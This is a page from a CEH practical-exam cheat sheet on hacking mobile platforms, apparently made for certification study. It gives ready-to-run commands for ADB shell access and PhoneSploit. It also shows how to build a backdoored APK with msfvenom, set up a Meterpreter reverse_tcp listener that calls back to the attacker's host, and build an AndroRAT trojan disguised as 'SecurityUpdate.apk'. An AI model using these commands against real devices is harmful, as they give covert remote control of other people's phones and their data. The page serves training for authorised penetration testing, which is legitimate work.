Thamizhiniyan C S
HomeWriteupsResourcesCheatsheets
CEH Practicals v12
CEH Practicals v12
  • Introduction
  • Foot Printing and Reconnaisance
  • Network Scanning and Enumeration
  • Service Enumeration
  • System Hacking
  • Steganography and Hiding Activities
  • Hacking Web Applications and Web Servers
  • Packet Analysis with Wireshark
  • Hacking Mobile Platforms
  • Wifi Hacking
  • S3 Bucket Enumeration
  • Cryptography
  • Malware Analysis
  • IoT Analysis and Hacking
  • Privilege Escalation
Powered by GitBook
On this page
  • ADB
  • PhoneSploit
  • APK using msfvenom
  • APK using AndroRat
  • APK Analysis

Was this helpful?

Hacking Mobile Platforms

PreviousPacket Analysis with WiresharkNextWifi Hacking

Last updated 1 year ago

Was this helpful?

ADB

  • adb connect <IP>:<ANY_port>

  • adb shell


PhoneSploit

Run PhoneSploit in terminal > enter the IP and port (5555) and choose the option.


APK using msfvenom

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=<localhost_IP> LPORT=<localport> --platform android -a dalvik -f raw -o backdoor.apk

  • msfconsole > use exploit/multi/handler > set payload android/meterpreter/reverse_tcp > set LHOST and LPORT

  • run multi/handler on the above mentioned port


APK using AndroRat

python3 androRAT.py —build -i <IP> -p <port> -o SecurityUpdate.apk

APK Analysis

adb (Android Debug Bridge) cheatsheetDevhints.io cheatsheets
Sixo Online APK Analyzer | sisik
Logo
Logo